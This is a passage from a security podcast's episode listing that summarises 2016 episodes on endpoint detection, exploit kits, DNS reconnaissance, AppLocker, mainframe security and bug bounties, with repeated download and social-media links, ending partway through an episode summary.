#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: June 6, 20162016-021: Carbon Black's CTO Ben Johnson on EDR, the layered approach, and threat intelligence
Ben Johnson (@chicagoben on Twitter) has spent a good deal of time working on protecting client's endpoints. From his work at the NSA, to being the co-founder of Carbon Black (@carbonblack_inc).
We managed to have him on to discuss EDR (#Endpoint Detection and Response), TTP (#Tactics, Techniques, and Procedures), and #Threat #Intelligence industry.
Ben discusses with us the Layered Approach to EDR:
1. Hunting
2. Automation
3. Integration
4. Retrospection
5. Patterns of Attack/Detection
6. indicator-based detection
7. Remediation
8. Triage
9. Visibility
We also discuss how VirusTotal's changes in policy regarding sharing of information is going to affect the threat intel industry.
Ben also discusses his opinion of our "Moxie vs. Mechanisms" podcast, where businesses spend too much on shiny boxes vs. people.
Brakesec apologizes for the audio issues during minute 6 and minute 22. Google Hangouts was not kind to us :(
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-021-Ben_Johnson-Carbon_black-Threat_intelligence.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-021-carbon-blacks-cto/id799131292?i=1000369579669&mt=2
YouTube: https://youtu.be/I10R3BeGDs4
RSS: http://www.brakeingsecurity.com/rss
Show notes: https://docs.google.com/document/d/12Rn-p1u13YlmOORTYiM5Q2uKT5EswVRUj4BJVX7ECHA/edit?usp=sharing (great info)
https://roberthurlbut.com/blog/make-threat-modeling-work-oreilly-2016
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: May 29, 20162016-020-College Vs. Certifications Vs. Self-taught
Dr. Matt Miller is a professor at the University of Nebraska at Kearney. We had him on to discuss a matter that seems to weigh heavily on the infosec community. What will a CS degree get you? What are you learning these days as a future code jockey? Is skipping college altogether better?
We discuss what he does to arm future developers with the tools necessary to get a job. We hear about what they also might be lacking in as well.
Dr. Miller is also spearheading a new cybersecurity degree track at his university. We discuss what it's like to head that up, and we even get into a bit of discussion on Assembly language.
ASM book used in the above class: http://www.drpaulcarter.com/pcasm/
Download here: http://www.drpaulcarter.com/pcasm/pcasm-book-pdf.zip
We also discuss free alternatives for learning out there, and how effective they are.
Show notes: https://docs.google.com/document/d/1Grimx_OCSURTktzM5QRKqsG9p9G5LljdleplH1DZQv4/edit?usp=sharing
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-020-College_vs_Certs_vs_self-taught.mp3
YouTube Playlist: https://www.youtube.com/playlist?list=PLqJHxwXNn7guMA6hnzex-c12q0eqsIV_K
RSS FEED: http://www.brakeingsecurity.com/rss
Dr. Miller's CSIT-301 course on Assembly: https://www.youtube.com/playlist?list=PLSIXOsmf9b5WxCMrt9LuOigjR9qMCRrAC
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @milhous30
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: May 21, 20162016-019-Creating proper business cases and justifications
Procurement is a process. Often a long drawn out, tedious process, but it is necessary to ensure that hardware and software is going to be what works in your organization.
We go over what is necessary to make sure your procurement is as smooth as possible. Some of the topics we discuss include:
1. Aligning business goals and operational goals
2. How to discuss ROI with management
3. Getting actionable information for business requirements from affected parties
4. Steering yourself away from confirmation bias or optimism bias, and ensuring you're thinking critically when comparing the current status quo vs. a new solution
5. Information you might want to gather from potential vendors to make a more informed decision as to whether their product is the one you want
And finally, we discuss how to handle the dread vendor demos. There may be a number of them, and they are arguably the best method of knowing the software or hardware is going to work for you.
This is a topic that affects everyone, whether you are a manager, or a user of the technology involved.
We also like to remind people that our DerbyCon CTF and raffle are still going on. There is plenty of time to get involved if you want a chance to get a ticket to Derbycon 2016!
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-019-business_cases_and_justifications-final.mp3
YouTube Link: https://youtu.be/8sWn1IYpgtY
Links referred to in the show:
http://www.ask.com/business-finance/business-justification-example-cdebe6f929949e8c
http://www.iso20022.org/documents/BJ/BJ044/ISO20022BJ_ATICA_v4_with_comments.pdf
http://klariti.com/business-case-2/business-case-justify-business-need/
https://en.wikipedia.org/wiki/Business_case
https://en.wikipedia.org/wiki/Optimism_bias
http://www.ehow.com/how_6672801_write-business-justification.html
http://www.acqnotes.com/acqnote/careerfields/establishing-software-requirements
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: May 16, 20162016-018-software restriction policies and Applocker
Windows has all the tools you need to secure an OS, but we rarely use them. One example of this is 'Software restriction policies'. Which is a method by which you can block certain files from being saved anywhere, what file types can be executed in a directory, and can even whether or not you should allow software to install.
We also discuss the use of parental controls as a cheap, easy method of restricting users to access certain websites, installing software from iTunes store, or restricting access to certain functions or applications.
Also, the 2nd clue for our CTF can be found in this podcast... see if you can find the giant clue... :)
**NOTE: We had an issue with Mr. Boettcher's Windows 10 install, he's using Windows 10 Home, which does not appear to have Applocker or Software Restriction Policy by default. So, I cut a lot of us bickering^H^H^H^H discussing how to get it to work, so the middle around 25:00 mark will feel a tad off. Apologies... I should have stopped recording.
Links referred to during the podcast:
https://technet.microsoft.com/en-us/library/hh831534.aspx
http://mechbgon.com/srp/ - LOL, mentions the use of ‘parental controls’ to restrict systems
http://www.instructables.com/id/Getting-past-Software-Restriction-Policies/
http://www.itingredients.com/how-to-deploy-software-restriction-policy-gpo/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-018-software_restriction_policy-applocker.mp3
#iTunes Link: https://itunes.apple.com/us/podcast/2016-018-software-restriction/id799131292?i=1000368338483&mt=2
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: May 9, 20162016-017-The Art of Networking, Salted Hashes, and the 1st annual Podcast CTF!
You might have heard "Network when you can, not when you have to..." The art of network is creating connections and nurturing relationships that benefit everyone. This week we discuss building networks, creating people networks that allow for free sharing of ideas and knowledge. Whether it be a professional organization,like ISSA or ISC2 meetings, or you just get a bunch of people together to have coffee on a Saturday morning.
We also brainstorm ideas on how people in our community keep their skills sharp, and why some seem to allow them to atrophy once they get a specific certification or degree. We cite examples of things and actions that allow you to gain more knowledge, and to ensure your company will still see you as an SME. CPEs can be gained in the most simplest of methods. Just by listening to this podcast, for example, you can receive one CPE (1 hour = 1CPE) there are many other ways of getting them. and we cite several in this podcast.
We also discuss the continued use of unsalted, weakly hashed passwords in systems, and why a recent breach of a custom Minecraft implementation allowed it to occur.
Story: http://news.sky.com/story/1687550/minecraft-hack-exposes-seven-million-passwords
But I think the most exciting part of the podcast is theannouncement of the 1st annual Brakeing Down Security PodcastCTF!The details can be found in the podcast.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-017-Networking-Podcast_CTF-salted_hashes.mp3
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
#iTunes: https://itunes.apple.com/us/podcast/2016-017-art-networking-salted/id799131292?i=367885714&mt=2
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: May 2, 20162016-016-Exploit Kits, the "Talent Gap", and buffer overflows
Angler, Phoenix, Zeus... all famous exploit kits that are used to move malware into your environment. This week, Mr. Boettcher and I discuss the merits of Exploit kits, how they function and what can be done to stop them. They are only getting more numerous and they will be serving more malware to come.
We shift gears and discuss the 'talent gap' the media keeps bringing up, and whether it's perceived or real. We discuss the industry as a whole, and what caused the gap, and if it will get better...
*BONUS*... after the audio, listen to me (Bryan) failing at understanding buffer overflow exercises I'm doing as part of my #OSCP certification...
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-016.-Exploit_kits_Talent_Gaps_and_buffer_overflows.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-016-exploit-kits-talent/id799131292?i=367465364&mt=2
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: April 25, 20162016-015-Dr. Hend Ezzeddine, and changing organizational security behavior
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-015-Dr._Hend_Ezzeddine_and_finding_security_training_that_works.mp3
iTunes Link: https://itunes.apple.com/us/podcast/2016-015-dr.-hend-ezzeddine/id799131292?i=366936677&mt=2
Dr. Ezzeddine's slides from Bsides Austin (referenced during the interview): https://drive.google.com/file/d/0B-qfQ-gWynwiQnBXMnJVeko4M25pdk1Sa0JnMGJrZmltWlRr/view?usp=sharing
You open the flash animation, click click click, answer 10 security questions that your 5 year old could answer, get your certificate of completion... congratulations, you checked the compliance box...
But what did you learn in that training? If you can't remember the next day, maybe it's because the training failed to resonate with you?
Have you ever heard red team #pentester say that the weakest link in any business is not the applications, or the hardware, but the people? If they can't find a vulnerability, the last vulnerability is the people. One email with a poisoned .docx, and you have a shell into a system...
Targeted trainings, and the use of certain styles of #training (presentations, in-person, hand puppets, etc) can be more effective for certain groups. Also, certain groups should have training based on the threat they might be susceptible to...
Dr. Hend #Ezzeddine came by this week to discuss how she helps #organizations get people to understand security topics and concepts, to create a positive security culture. Maybe even a culture that will not click on that attachment...
**If you are planning on attending "Hack In The Box" in Amsterdam, The Netherlands on 23-27 May 2016, you can receive a 10% discount by entering 'brakesec' at checkout.
Get more information at the "Hack In The Box" conference by visiting:
http://conference.hitb.org/hitbsecconf2016ams/
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
On #Twitter: @brakesec @boettcherpwned @bryanbrake @hackerhurricane
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Player.FM : https://player.fm/series/brakeing-down-security-podcast
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
2016-014-User_Training,_Motivations,_and_Speaking_the_Language
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-014-User_Training_Motivation_and_Languages.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-014-user-training-motivations/id799131292?i=366433676&mt=2
Fresh back from my vacation, Mr. Boettcher and I got to discussing things that have weighed on our minds, and I had a story from my travels that fit in perfectly with our discussion.
What does our industry (Infosec Practitioners) to motivate people to be secure? Is it a language barrier? I don't mean Spanish/English, but do we do a good job at speaking "user"? How can we do a better job at that if we find ourselves failing? How can speaking 'manager' or 'VP' help us get help that we need? For many, it's like the difference in communicating with someone who speaks Mandarin.
We discussed the need to educate people against thumbdrive insertion, even in the face of a study of people inserting random thumbdrives into their computers. We discuss the motivation of users who do so, whether it's altruistic, or malicious:
We discussed an app logic flaw that were found recently in the news:
http://www.digitaltrends.com/mobile/free-pizza/
Which is exactly what we were talking about when talking to Ben Caudill a few weeks ago about app logic flaws. This flaw has been in the app for a good long time, and while the security researcher saw fit to report it, the ethical implications of keeping it secret could have cost Domino's a lot.
Mr. Boettcher gives us a report of Bsides Austin, and how it's grown in the past few years. We finish up discussing infosec conferences and how they appear to be thriving. Is it good marketing, or are companies finally understanding their importance?
**If you are planning on attending "Hack In The Box" in Amsterdam, The Netherlands on 23-27 May 2016, you can receive a 10% discount by entering 'brakesec' at checkout.
Get more information at the "Hack In The Box" conference by visiting:
http://conference.hitb.org/hitbsecconf2016ams/
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
On #Twitter: @brakesec @boettcherpwned @bryanbrake @hackerhurricane
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Player.FM : https://player.fm/series/brakeing-down-security-podcast
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
Published on: April 8, 2016
2016-013-Michael Gough, the ISSM reference model, and the 5 P's
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-013-michael_gough-the_5_Ps.mp3
iTunes: https://itunes.apple.com/us/podcast/2015-013-michael-gough-issm/id799131292?i=365622423&mt=2
We discuss a model that Michael Gough used while he was at HP. The Information Security and Service Management (ISSM) Reference model can be used to help companies align their IS and IT goals with the businesses goals... If you've been a listener of our podcast for a while now, you might have heard our 2-part podcast on ITIL with Tim Wood, which is a service based solution to enable your IT and infosec initiatives to also align with your business needs.
From the ISSM whitepaper:
"organizations need to build and run an integrated service management system that addresses security and risk management as well as the regulatory compliance imposed on the agency while ensuring that agreed services are provided to internal and external customers and managed end-to-end.
For agencies and organizations to achieve meaningful service outcomes, technology and agency decision makers need to align their goals and strategies more closely while dealing with an increasing amount of technologies, threats, and regulatory compliance requirements."
We discuss the idea of the "5 P's", which are "Policy, Process, People, Products (or technology), and Proof", and how they are important to the implementation of the #ISSM reference model
Finally, we discuss a typical engagement using the ISSM model. Creation of the 7 Core components and additional using a maturity model to self-assess your company in an effort to show transparency to your internal processes.
Important links:
http://www8.hp.com/h20195/V2/getpdf.aspx/4AA2-2350ENW.pdf?ver=1.0
http://www.digitalgovernment.com/media/Downloads/asset_upload_file772_2477.pdf
https://en.wikipedia.org/wiki/Information_security_management_system
http://www.davebolick.com/SampleNewsletterHPFinancialAdvisor.pdf
http://media.govtech.net/HP_RC_08/Security_RC/ISSM_for_SLG.pdf
Integrating ITIL into infosec: http://traffic.libsyn.com/brakeingsecurity/2015-018-Integrating_infosec_with_ITIL.mp3
http://traffic.libsyn.com/brakeingsecurity/2015-017_ITIL_and_infosec.mp3
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
On #Twitter: @brakesec @boettcherpwned @bryanbrake @hackerhurricane
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Player.FM : https://player.fm/series/brakeing-down-security-podcast
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
#cobit, #cmmi, #maturity model, #ISSM, #ITIL, #Service, #management, #reference model, #ISO, #27002, #27001, CISSP, #podcast, #infosec, #compliance
Published on: March 26, 20162016-012-Ben Caudill on App Logic Flaws, and Responsible Disclosure
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-012-Ben_Caudill-Application_Logic_Flaws.mp3
Itunes: iTunes: https://itunes.apple.com/us/podcast/2016-012-ben-caudill-on-app/id799131292?i=365094523&mt=2
Ever bought "-1" of an item on a retail site? Or was able to bypass key areas of an application and get it bypass authentication, or you were able to bypass a paywall on a site?
Application logic flaws are often insidious and not easy to find. they require often a bit of work to bypass, and are often missed by testing groups with rigid test plans, as they violate the flow of an application. "Why would they do that? That doesn't make any sense..." often precludes the finding of an application logic flaw.
This week, we interview Ben Caudill from Rhino Security, who discussed a logic flaw that could be used to de-anonymize someone by creating fake profiles..
We then discuss how Ben went through contacting the company, what happened after initial disclosure, and how it was fixed.
http://www.theguardian.com/technology/2014/aug/26/secret-app-cyberbullying-security-hackers
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
On #Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Player.FM : https://player.fm/series/brakeing-down-security-podcast
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
#infosec, #podcast, #CISSP, #CPEs, #vulnerability #disclosure, #responsible #disclosure, #application #security, #logic #flaws, Ben #Caudill, #Rhino #Security
Published on: March 19, 20162016-011-Hector Monsegur, deserialization, and bug bounties
Download Here: http://traffic.libsyn.com/brakeingsecurity/2016-011-Hector_Monsegur-bug_bounties-serialization.mp3
iTunes Direct Link: https://itunes.apple.com/us/podcast/2016-011-hector-monsegur-serialization/id799131292?i=364768504&mt=2
Hector Monsegur has had a colorful history. A reformed black hat who went by the name 'Sabu' when he was involved in the hacker collectives "Lulzsec" and "Anonymous", he turned state's evidence for the FBI, working to stop further hacking attempts by the same people he was working with.
https://en.wikipedia.org/wiki/Hector_Monsegur
This week, we got to sit down with Hector, to find out what he's been doing in the last few years. Obviously, a regular job in the security realm for a large company is not possible for someone with a colorful past that Mr. Monsegur has. So we discuss some of the methods that he's used to make ends meet.
Which brings us to the topic of bug bounties. Do they accomplish what they set out to do? Are they worth the effort companies put into them? And how do you keep bounty hunters from going rogue and using vulnerabilities found against a company on the side?
In an effort to satisfy my own curiosity, I asked Hector if he could explain what a 'deserialization' vulnerability is, and how it can be used in applications. They are different than your run of the mills, every day variety OWASP error, but this vulnerability can totally ruin your day...
Finally, we ask Hector some advice for that 'proto black hat' who is wanting to head down the road that Hector went. The answer will surprise you...
We hope you enjoy this most interesting interview with a enigmatic and controversial person, and hope that the information we provide gives another point of view into the mind of a reformed "black hat" hacker...
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
On #Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Player.FM : https://player.fm/series/brakeing-down-security-podcast
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
#infosec, #blackhat, hector #monsegur, #hacker, #anonymous, #lulzsec, #FBI, #Sabu, #deserialization, #bug #bounties, #hackerone, #bugcrowd, #podcast, #de-serialization, #penetration tests, #social #engineering, #CISSP
Published on: March 14, 20162016-010-DNS_Reconnaissance
DNS... we take it for granted... it's just there. And we only know it's broken when your boss can't get to Facebook.
This week, we discuss the Domain Naming System (DNS). We start with a bit of history, talking about the origins of DNS, some of the RFCs involved in it's creation, how it's hierarchical structure functions to allow resolution to occur, and even why your /etc/hosts is important.
We discuss some of the necessary fields in your DNS records. MX, ALIAS, CNAME, SOA, TXT, and how DNS is used for non-repudiation in email.
We also touch on how you can use DNS to enumerate an external network presence when you are the red team, and what you should know about to make it harder for bad actors to not use your external DNS in amplification attacks.
Finally, you can't have a discussion about DNS without talking about how to secure your DNS implementation. So we supply you with a few tips and best practices.
Plenty of informational links down below, including links to the actual RFCs (Request for Comment) which detail how DNS is supposed to function. Think of them as the owner's manual for your car.
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-010-DNS_Reconnaissance.mp3
#iTunes: https://itunes.apple.com/us/podcast/2016-010-dns-reconnaissance/id799131292?i=364331694&mt=2
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
On #Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Player.FM : https://player.fm/series/brakeing-down-security-podcast
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
Podcast Links we used for information:
http://www.slideshare.net/BizuworkkJemaneh/dns-42357401
300+ million domains registered: https://www.verisign.com/en_US/internet-technology-news/verisign-press-releases/articles/index.xhtml?artLink=aHR0cDovL3ZlcmlzaWduLm13bmV3c3Jvb20uY29tL2FydGljbGUvcnNzP2lkPTIwMTIwNTI%3D
https://technet.microsoft.com/en-us/library/cc770432.aspx
http://security-musings.blogspot.com/2013/03/building-secure-dns-infrastructure.html
http://tldp.org/HOWTO/DNS-HOWTO-6.html
https://en.wikipedia.org/wiki/Domain_Name_System
https://en.wikipedia.org/wiki/DNS_spoofing
http://www.esecurityplanet.com/network-security/how-to-prevent-dns-attacks.html
http://www.thegeekstuff.com/2012/05/ettercap-tutorial/
https://support.google.com/a/answer/48090?hl=en
http://www.ecsl.cs.sunysb.edu/tr/TR187.pdf
https://tools.ietf.org/html/rfc882
https://tools.ietf.org/html/rfc883
https://tools.ietf.org/html/rfc1034
https://tools.ietf.org/html/rfc1035
Published on: March 7, 2016
2016-009-Brian Engle, Information Sharing, and R-CISC
We've reached peak "Br[i|y]an" this week when we invited our friend Brian Engle on to discuss what his organization does. Brian is the Executive Director of the Retail Cyber Intelligence Sharing Center.
"Created by retailers in response to the increased number and sophistication of attacks against the industry, the R-CISC provides another tool in retailers’ arsenal against cyber criminals by sharing leading practices and threat intelligence in a safe and secure way." -- R-CISC website
To learn more, visit https://r-cisc.org/
We discussed with Brian a bit of the history of the #R-CISC, and why his organization was brought into being. We ask Brian "How do you get companies who make billions of dollars a year to trust another competitor enough to share that they might have been compromised?" "And how do you keep the information sharing generic enough to not out a competitor by name, but still be actionable enough to spur members to do something to protect themselves?"
Other links:
Veris framework Mr. Boettcher mentions: http://veriscommunity.net/
TAXII protocol: https://taxiiproject.github.io/
STIX https://stixproject.github.io/
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-009-brian_engle_rcisc_information_sharing.mp3
On #Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Player.FM : https://player.fm/series/brakeing-down-security-podcast
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
iTunes: https://itunes.apple.com/us/podcast/2016-009-brian-engle-information/id799131292?i=364002695&mt=2
#actionable, #brian, #engle, #cissp, #cpes, #data, #financial, #infections, #isac, #malware, #podcast, #rcisc, #retail, #security, #infosec, #threat #intelligence
Photo of Brian Engle courtesy of https://r-cisc.org
**I (Bryan) apologize for the audio. I did what I could to clean it up. Seriously don't know what happened to screw it up that badly. I can only imagine it was bandwidth issues on my Skype connection**
Published on: February 29, 20162016-008-Mainframe Security
This week's super-sized episode is brought to us thanks to previous guest Cheryl Biswas. You might remember her from our "Shadow IT" (http:/brakeingsecurity.com/2015-048-the-rise-of-the-shadow-it) podcast a few months ago. She reached out to us to see if we were interested in doing a podcast on mainframe security with her and a couple of gentlemen that were not unknown to us.
Of course we jumped at the chance! You might know them as @mainframed767 and @bigendiansmalls (Chad) on Twitter. They've been trying to get people to be looking into mainframes and mainframe security for years. Mainframes are usually used by financial organizations, or older organizations. In many cases, these systems are managed by a handful of people, and you will have little or no help if you are a red teamer or pentester to make sure these systems are as secured as they possibly can.
So, Cheryl (@3ncr1pt3d), @bigendiansmalls, and @mainframed767 (Philip) walk us through how a mainframe functions. We discuss what you might see when a scan occurs, that if runs a mainframe OS, and a Linux 'interface' OS.
We also discuss methods you can use to protect your organization, and methods you can use as a redteamer to learn more about mainframes.
Chad's talk at DerbyCon 2015: https://www.youtube.com/watch?v=b5AG59Y1_EY
Chad discussing mainframe Security on Hak5: https://www.youtube.com/watch?v=YBhsWvlqLPo
Linux for mainframes: http://www-03.ibm.com/systems/linuxone/
Philip's talks on Youtube: https://www.youtube.com/playlist?list=PLBVy6TfEpKmEL56fb5AnZCM8pXXFfJS0n
Brian and I wish to thank Cheryl for all her help in making this happen. You can find her blog over at Alienvault's site... https://www.alienvault.com/blogs/author/cheryl-biswas
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Bryan's Twitter: http://www.twitter.com/bryanbrake
Brian's Twitter: http://www.twitter.com/boettcherpwned
Join our Patreon!: https://www.patreon.com/bds_podcast
Tumblr: http://brakeingdownsecurity.tumblr.com/
RSS FEED: http://www.brakeingsecurity.com/rss
Comments, Questions, Feedback: [email protected]
**NEW** Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
**NEW** Listen to us on Player.FM!! : https://player.fm/series/brakeing-down-security-podcast
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-008-mainframe_secruity.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-008-mainframe-security/id799131292?i=363392103&mt=2
Published on: February 22, 2016
2016-007-FingerprinTLS profiling application with Lee Brotherston
We first heard about FingerprinTLS from our friend Lee Brotherston at DerbyCon last September. Very intrigued by how he was able to fingerprint client applications being used, we finally were able to get him on to discuss this.
We do a bit of history about #TLS, and the versions from 1.0 to 1.2
Lee gives us some examples on how FingerprintTLS might be used by red teamers or pentest agents to see what applications a client has on their system, or if you're a blue team that has specific application limitations, you can find out if someone has installed an unauthorized product, or you could even block unknown applications using this method by sensing the application and then creating an IPS rule from the fingerprint.
Finally, something a bit special... we have a demo on our Youtube site that you can view his application in action!
Video demo: https://youtu.be/im6un0cB3Ns
http://blog.squarelemon.com/tls-fingerprinting/
https://github.com/LeeBrotherston/tls-fingerprinting
http://www.slideshare.net/LeeBrotherston/tls-fingerprinting-sectorca-edition
https://www.youtube.com/watch?v=XX0FRAy2Mec
http://2015.video.sector.ca/video/144175700
Cisco blog on malware using TLS... http://blogs.cisco.com/security/malwares-use-of-tls-and-encryption
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Bryan's Twitter: http://www.twitter.com/bryanbrake
Brian's Twitter: http://www.twitter.com/boettcherpwned
Join our Patreon!: https://www.patreon.com/bds_podcast
Tumblr: http://brakeingdownsecurity.tumblr.com/
RSS FEED: http://www.brakeingsecurity.com/rss
Comments, Questions, Feedback: [email protected]
**NEW** Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
**NEW** Listen to us on Player.FM!! : https://player.fm/series/brakeing-down-security-podcast
iTunes: https://itunes.apple.com/us/podcast/2016-007-fingerprintls-profiling/id799131292?i=362885277&mt=2
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-007-FingerprinTLS_with_Lee_Brotherston.mp3
Published on: February 14, 20162016-006-Moxie_vs_Mechanism-Dependence_On_Tools
This week starts with an apology to Michael Gough about comments I (Bryan) mangled on the "Anti-Virus... What is it good for?" podcast. Then we get into the meat of our topic... a person's "Moxie" vs. a mechanism
Moxie: noun
"force of character, determination, or nerve."
